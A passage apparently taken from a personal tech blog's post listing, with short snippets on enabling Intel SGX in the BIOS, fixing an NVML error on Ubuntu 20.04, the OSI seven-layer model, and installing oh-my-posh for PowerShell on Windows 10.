By setting the option to Enable, all SGX instructions and resources become available to applications, making it easy to deploy SGX-related programs on your machine. However, on some motherboards, the only available options in the BIOS are Software Controlled and Disable. According to Intel's official documentation, Software Controlled indicates that Intel SGX can be enabled by software applications, but it is not available until this occurs (called the “software opt-in”).

How to Fix Failed to Initialize NVML Error in Ubuntu 20.04

Tue, 22 Sep 2020 14:03:06 +0800

Updating the NVIDIA driver to 440.82 fixed this problem :)

OSI 7-Layer Model

Thu, 10 Sep 2020 10:29:19 +0000

The Open Systems Interconnection (OSI) model (defined in ISO/IEC 7498-1), a reference tool for understanding data communication between two networked systems, divides the communication process into 7 layers:

Physical layer
Data link layer
Network layer
Transport layer
Session layer
Presentation layer
Application layer

Those layers break the network up into manageable pieces and provide a common language for explaining components and their functions. This article gives an overview of the 7 layers from top to bottom.

Config oh-my-posh on Windows 10

Tue, 08 Sep 2020 07:05:30 +0000

oh-my-posh, an alternative to oh-my-zsh on *nix-based systems, is a beautiful theme engine for PowerShell in Windows Terminal.

Prerequisites

Windows Terminal
Git
Powerline fonts (at least one font must be installed)

Installation

Use the following commands to install oh-my-posh in your Windows Terminal:

Install-Module posh-git -Scope CurrentUser  
Install-Module oh-my-posh -Scope CurrentUser

Now that oh-my-posh is installed on your computer, use the following commands to enable the prompt:
